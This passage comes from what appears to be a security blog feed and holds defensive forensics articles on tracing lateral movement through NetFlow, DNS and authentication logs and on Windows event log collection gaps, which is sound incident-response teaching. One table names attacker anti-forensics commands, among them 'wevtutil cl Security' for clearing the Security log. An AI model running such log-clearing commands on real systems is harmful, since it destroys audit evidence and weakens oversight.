class=\"token plain\">logs \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">ip </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">10.10</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">.5</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">.42</span><span class=\"token plain\"> \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">time </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 02:47:33\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Output: 10.10.5.42 at 2025-11-15 02:47:33 was LAPTOP-JSMITH (MAC: 00:1A:2B:...)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-artifacts-that-survive-attacker-cleanup\">Part 8  The Artifacts That Survive Attacker Cleanup<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-8--the-artifacts-that-survive-attacker-cleanup\" class=\"hash-link\" aria-label=\"Direct link to Part 8  The Artifacts That Survive Attacker Cleanup\" title=\"Direct link to Part 8  The Artifacts That Survive Attacker Cleanup\" translate=\"no\">​</a></h2>\n<p>Sophisticated attackers attempt to remove evidence. Understanding what survives cleanup determines whether your investigation can proceed after the attacker has tried to cover tracks.</p>\n<table><thead><tr><th>Attacker Action</th><th>What Is Destroyed</th><th>What Survives</th></tr></thead><tbody><tr><td><code>ipconfig /flushdns</code> on source</td><td>Local DNS cache</td><td>DNS server query logs, DHCP records, NetFlow</td></tr><tr><td><code>wevtutil cl Security</code> on target</td><td>Target's Security event log</td><td>DC's 4769 records showing service ticket to target, NetFlow showing the connection</td></tr><tr><td>Delete DHCP log files</td><td>DHCP daily logs</td><td>Active lease database (<code>dhcp.mdb</code>), SIEM if logs were ingested</td></tr><tr><td>Spoof MAC address</td><td>Correct MAC in DHCP logs</td><td>Anomalous MAC not in asset inventory, IP conflict events (DHCP ID 24)</td></tr><tr><td>VPN / proxy through another internal host</td><td>Direct source IP in NetFlow</td><td>Intermediate host shows elevated connection count, DHCP shows presence of intermediate</td></tr><tr><td>Disable NetFlow on switch</td><td>Future NetFlow data</td><td>Historical NetFlow from before disable event</td></tr><tr><td>Rename computer before lateral move</td><td>Hostname in DNS</td><td>MAC address correlation still possible, old DNS PTR records</td></tr></tbody></table>\n<p><strong>The most resilient artifact: NetFlow from core switch</strong></p>\n<p>The attacker would need administrative access to your core switching infrastructure to retroactively destroy NetFlow. In most organizations, this is a separate administrative domain from Windows servers. Even if the attacker cleans every Windows log, the flow records showing the connections remain on the collector.</p>\n<p><strong>The second most resilient: DNS server query logs (if enabled)</strong></p>\n<p>The attacker cleaning logs on workstations and servers does not affect DNS query logs on the DNS server. These are particularly valuable because they capture <strong>every hostname the attacker resolved</strong>, including reconnaissance against hosts they never successfully connected to.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"summary-the-correlation-matrix\">Summary: The Correlation Matrix<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#summary-the-correlation-matrix\" class=\"hash-link\" aria-label=\"Direct link to Summary: The Correlation Matrix\" title=\"Direct link to Summary: The Correlation Matrix\" translate=\"no\">​</a></h2>\n<p>When you have an IR scenario and need to know which sources answer which questions, use this reference:</p>\n<table><thead><tr><th>Question</th><th>Primary Source</th><th>Secondary Source</th><th>Command</th></tr></thead><tbody><tr><td>What hosts did X talk to?</td><td>NetFlow</td><td>DNS cache</td><td><code>nfdump \"src ip X and dst net internal\"</code></td></tr><tr><td>What hostname owned IP Y at time T?</td><td>DHCP logs</td><td>DNS PTR records</td><td><code>resolve_ip(Y, T)</code> from dhcp_correlator.py</td></tr><tr><td>What account was used for connection?</td><td>DC Security 4624/4769</td><td>Target 4624</td><td><code>Get-WinEvent ... Id 4624 -FilterXPath</code></td></tr><tr><td>Was pass-the-hash used?</td><td>DC/Target 4624 KeyLength=0</td><td>NetFlow NTLM port pattern</td><td>KeyLength field in 4624 XML</td></tr><tr><td>When did attacker first appear?</td><td>DHCP first Assign event</td><td>NetFlow earliest record</td><td><code>nfdump earliest</code> + DHCP first seen</td></tr><tr><td>Which hosts were scanned but not compromised?</td><td>NetFlow SYN-only flows</td><td>DNS cache of source</td><td>TCP flags analysis in nfdump</td></tr><tr><td>What data was staged/exfiltrated?</td><td>NetFlow bytes, off-hours large transfers</td><td>DNS cache for staging host</td><td><code>nfdump \"dst net internal and byt &gt; 100MB\"</code></td></tr><tr><td>Did the attacker modify logs?</td><td>Event 1102, 4719 on DCs</td><td>SIEM volume anomaly</td><td><code>Get-WinEvent ... Id 1102, 4719</code></td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Docs: DHCP Server Log Event IDs  complete event ID reference</li>\n<li class=\"\">nfdump documentation: nfdump.sourceforge.io  complete query syntax</li>\n<li class=\"\">NSA: \"Detect and Prevent Web Shell Malware\"  NetFlow analysis methodology</li>\n<li class=\"\">SANS: \"Network Forensics Analysis\" course materials  flow analysis techniques</li>\n<li class=\"\">MITRE ATT&amp;CK T1021.002 (SMB/Windows Admin Shares)  lateral movement documentation</li>\n<li class=\"\">MITRE ATT&amp;CK T1550.002 (Pass the Hash)  detection guidance</li>\n<li class=\"\">Cisco: NetFlow Configuration Guide  enabling NetFlow on Cisco infrastructure</li>\n<li class=\"\">Microsoft Security: \"Token Theft Playbook\"  auth log correlation methodology</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>  fix the event collection gaps that force you into DNS and NetFlow reconstruction</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>  the full attacker timeline this forensics methodology is designed to reconstruct</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>  cloud-layer lateral movement that doesn't show up in on-prem NetFlow</li>\n</ul>\n<hr>\n<p><em>All commands and techniques described in this post are standard incident response and forensic analysis procedures. They operate against infrastructure and logs that the analyst has administrative access to as part of an authorized investigation.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs",
            "title": "Network Forensics Without a Tap: Reconstructing Lateral Movement from DNS Cache, NetFlow, and Authentication Logs",
            "summary": "How to reconstruct lateral movement using DNS cache, DHCP logs, NetFlow, and Windows auth logs when you have no packet capture.",
            "date_modified": "2026-04-19T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "network-forensics",
                "incident-response",
                "lateral-movement",
                "detection-engineering",
                "netflow",
                "dns-forensics"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events",
            "content_html": "<blockquote>\n<p>An analyst flags a suspicious lateral movement alert. You pull the investigation timeline. There is a 47-minute gap in process creation events from a critical server  right across the window where the attacker moved. The EDR shows nothing. The SIEM shows nothing. Post-incident forensics on the local machine reveals 6,800 events that never left the endpoint. The Security event log overwrote itself. The WEF subscription had a filter bug. The WEC server was under load. Nobody noticed because nobody measured. This scenario is not hypothetical  it is the most common root cause of detection gaps found during post-incident reviews, and it is almost entirely preventable.</p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-this-matters-more-than-any-detection-rule-youll-write\">Why This Matters More Than Any Detection Rule You'll Write<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#why-this-matters-more-than-any-detection-rule-youll-write\" class=\"hash-link\" aria-label=\"Direct link to Why This Matters More Than Any Detection Rule You'll Write\" title=\"Direct link to Why This Matters More Than Any Detection Rule You'll Write\" translate=\"no\">​</a></h2>\n<p>Security teams invest enormous effort writing detection rules, tuning Sigma, and expanding MITRE ATT&amp;CK coverage. Those efforts are worthless if the underlying events never reach your SIEM.</p>\n<p>The assumption baked into virtually every SIEM dashboard is that the event collection pipeline is working. That assumption is almost never tested, and when it fails, it fails silently. There is no alert for \"we stopped receiving process creation events from this host.\" There is no dashboard tile that turns red when your WEC server starts dropping events under load. There is no automatic notification when a GPO conflict silently rolls back your advanced audit policy to defaults.</p>\n<p>The result is what security engineers sometimes call coverage theater  you have the rules, you have the dashboards, you have the ATT&amp;CK heatmap lit up, but underneath it all is a collection infrastructure with real gaps that an attacker who understands Windows internals will never trigger an alert through.</p>\n<p>This post goes from first principles  how Windows event logging actually works internally  through the specific failure modes that cause events to be lost, and ends with concrete tools and scripts you can run this week to measure your actual collection fidelity.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--the-architecture-from-kernel-event-to-siem-record\">Part 1  The Architecture: From Kernel Event to SIEM Record<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-1--the-architecture-from-kernel-event-to-siem-record\" class=\"hash-link\" aria-label=\"Direct link to Part 1  The Architecture: From Kernel Event to SIEM Record\" title=\"Direct link to Part 1  The Architecture: From Kernel Event to SIEM Record\" translate=\"no\">​</a></h2>\n<p>Understanding where events can be lost requires understanding the full pipeline. Most practitioners know the high-level model. Few know the internals where things actually break.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-event-tracing-for-windows-etw-the-kernel-foundation\">1.1 Event Tracing for Windows (ETW): The Kernel Foundation<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#11-event-tracing-for-windows-etw-the-kernel-foundation\" class=\"hash-link\" aria-label=\"Direct link to 1.1 Event Tracing for Windows (ETW): The Kernel Foundation\" title=\"Direct link to 1.1 Event Tracing for Windows (ETW): The Kernel Foundation\" translate=\"no\">​</a></h3>\n<p>Every Windows event originates in Event Tracing for Windows (ETW)  the low-level kernel subsystem that acts as the backbone for all Windows telemetry. ETW is not the same as the Windows Event Log. It is the underlying transport mechanism.</p>\n<!-- -->\n<p>Ten distinct failure points across four layers. An event can be lost at any one of them, with no notification to the analyst on the other end.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-the-etw-ring-buffer--where-events-are-born-and-first-lost\">1.2 The ETW Ring Buffer  Where Events Are Born and First Lost<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#12-the-etw-ring-buffer--where-events-are-born-and-first-lost\" class=\"hash-link\" aria-label=\"Direct link to 1.2 The ETW Ring Buffer  Where Events Are Born and First Lost\" title=\"Direct link to 1.2 The ETW Ring Buffer  Where Events Are Born and First Lost\" translate=\"no\">​</a></h3>\n<p>ETW operates using in-memory ring buffers  circular memory regions that providers write events into. Consumers (including the Windows Event Log service) read from these buffers. When a buffer fills faster than consumers can drain it, new events overwrite old ones in memory before they are ever written to disk.</p>\n<p>This is not the same as log overwriting (which happens on disk). ETW ring buffer overflow is silent, in-memory loss that leaves no trace of the dropped events  not even a gap in the EventRecordID sequence.</p>\n<p>ETW buffer parameters are configurable but almost never tuned:</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View current ETW session configuration for a specific session</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">logman query \"EventLog-Security\" -ets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Sample output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Name:                 EventLog-Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Status:               Running</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Root Path:            %systemdrive%\\PerfLogs\\Admin</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Segment:              Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Schedules:            On</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Segment Max Size:     100 MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Name:                 EventLog-Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Type:                 Trace</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Append:               Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Circular:             Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Overwrite:            Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffer Size:          64              ← 64KB per buffer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffers Lost:         0               ← Watch this number</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffers Written:      15432</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffer Flush Timer:   1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Clock Type:           System</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: File Mode:            Real-time</span><br></span></code></pre></div></div>\n<p>The <code>Buffers Lost</code> counter is the key metric. If this is non-zero, events are being dropped in ETW before the Event Log service even sees them. Check this on domain controllers and high-activity servers:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Check ETW buffer loss for all active security-related sessions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-WinEvent -ListLog Security | Select-Object LogName, RecordCount, IsEnabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># More detailed: check ETW session stats via Performance Counters</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$counterPaths = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Security System-Wide Statistics\\Audit Failures',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Security System-Wide Statistics\\System Events'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter -Counter $counterPaths -SampleInterval 1 -MaxSamples 5</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"13-the-evtx-file-structure-and-how-overwrites-work\">1.3 The EVTX File: Structure and How Overwrites Work<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#13-the-evtx-file-structure-and-how-overwrites-work\" class=\"hash-link\" aria-label=\"Direct link to 1.3 The EVTX File: Structure and How Overwrites Work\" title=\"Direct link to 1.3 The EVTX File: Structure and How Overwrites Work\" translate=\"no\">​</a></h3>\n<p>Windows event logs are stored as <code>.evtx</code> (XML Event Log) files in <code>C:\\Windows\\System32\\winevt\\logs\\</code>. The format uses a chunked binary structure:</p>\n<!-- -->\n<p>When the log wraps, EventRecordIDs continue incrementing  they do not reset. This means you can detect overwrite gaps by looking for discontinuities in the EventRecordID sequence. A jump from EventRecordID 482,441 to 489,209 means 6,768 events were overwritten and are gone.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect EventRecordID gaps that indicate log overwriting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on a remote host or locally</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$events = Get-WinEvent -LogName Security -MaxEvents 100 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object RecordId, TimeCreated, Id |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">for ($i = 1; $i -lt $events.Count; $i++) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $gap = $events[$i].RecordId - $events[$i-1].RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($gap -gt 1) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"GAP DETECTED: RecordId jumped from $($events[$i-1].RecordId) to $($events[$i].RecordId)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  Missing events: $($gap - 1)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  Time of gap: $($events[$i-1].TimeCreated) → $($events[$i].TimeCreated)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--audit-policy-the-silent-misconfiguration\">Part 2  Audit Policy: The Silent Misconfiguration<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-2--audit-policy-the-silent-misconfiguration\" class=\"hash-link\" aria-label=\"Direct link to Part 2  Audit Policy: The Silent Misconfiguration\" title=\"Direct link to Part 2  Audit Policy: The Silent Misconfiguration\" translate=\"no\">​</a></h2>\n<p>Before a single event travels anywhere, it must first be generated. Audit policy controls what the Security Reference Monitor (the kernel component that enforces security policy) actually logs. This is where the majority of defensive coverage gaps originate  not in the collection pipeline, but in the policy that controls whether events are generated at all.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-legacy-vs-advanced-audit-policy--the-conflict-that-silently-disables-your-logging\">2.1 Legacy vs. Advanced Audit Policy  The Conflict That Silently Disables Your Logging<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#21-legacy-vs-advanced-audit-policy--the-conflict-that-silently-disables-your-logging\" class=\"hash-link\" aria-label=\"Direct link to 2.1 Legacy vs. Advanced Audit Policy  The Conflict That Silently Disables Your Logging\" title=\"Direct link to 2.1 Legacy vs. Advanced Audit Policy  The Conflict That Silently Disables Your Logging\" translate=\"no\">​</a></h3>\n<p>Windows has two audit policy systems that can conflict:</p>\n<table><thead><tr><th>System</th><th>Location</th><th>Granularity</th><th>Subcategories</th></tr></thead><tbody><tr><td>Legacy Audit Policy</td><td>secpol.msc → Local Policies → Audit Policy</td><td>9 top-level categories</td><td>None</td></tr><tr><td>Advanced Audit Policy</td><td>secpol.msc → Advanced Audit Policy Configuration</td><td>10 categories, 58 subcategories</td><td>Full control</td></tr></tbody></table>\n<p>The critical, frequently unknown behavior: if both are configured, legacy policy wins by default and silently overrides advanced policy subcategories.</p>\n<p>Example of the conflict:</p>\n<!-- -->\n<p>The fix  one GPO setting that most organizations are missing:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GPO Path: Computer Configuration → Windows Settings → Security Settings →</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Local Policies → Security Options</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Audit: Force audit policy subcategory settings (Windows Vista or later)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          to override audit policy category settings\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: ENABLED</span><br></span></code></pre></div></div>\n<p>Without this setting enabled, any legacy audit policy in the GPO hierarchy silently defeats your advanced policy subcategories. You will see events being generated (because the legacy category is enabled), but you will lose the subcategory filtering that gives you specific, high-value event IDs.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-reading-your-actual-effective-audit-policy-not-what-you-configured\">2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#22-reading-your-actual-effective-audit-policy-not-what-you-configured\" class=\"hash-link\" aria-label=\"Direct link to 2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)\" title=\"Direct link to 2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)\" translate=\"no\">​</a></h3>\n<p>The GPO editor shows what you configured. <code>auditpol.exe</code> shows what is actually in effect on a given machine. These are often different.</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View the complete effective audit policy  all 58 subcategories</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Run on a DC, critical server, or workstation you want to verify</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /get /category:*</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Sample output (showing common gap areas):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: System audit policy</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Category/Subcategory                      Setting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Account Logon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Credential Validation                   No Auditing    ← PROBLEM: logons not logged</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Kerberos Authentication Service         Success        ← OK</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Kerberos Service Ticket Operations      Success        ← Missing Failure events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Other Account Logon Events              No Auditing    ← PROBLEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Logon/Logoff</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Logon                                   Success and Failure</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Logoff                                  Success</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Account Lockout                         Success</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Special Logon                           No Auditing    ← PROBLEM: admin logons missed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Other Logon/Logoff Events               No Auditing    ← PROBLEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Object Access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   File System                             No Auditing    ← May be intentional (too noisy)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Registry                                No Auditing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   SAM                                     No Auditing    ← PROBLEM on DCs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Certification Services                  No Auditing    ← ADCS attacks invisible</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Detailed File Share                     No Auditing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   File Share                              No Auditing    ← Lateral movement via shares</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Privilege Use</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Sensitive Privilege Use                 No Auditing    ← PROBLEM: SeDebugPrivilege, 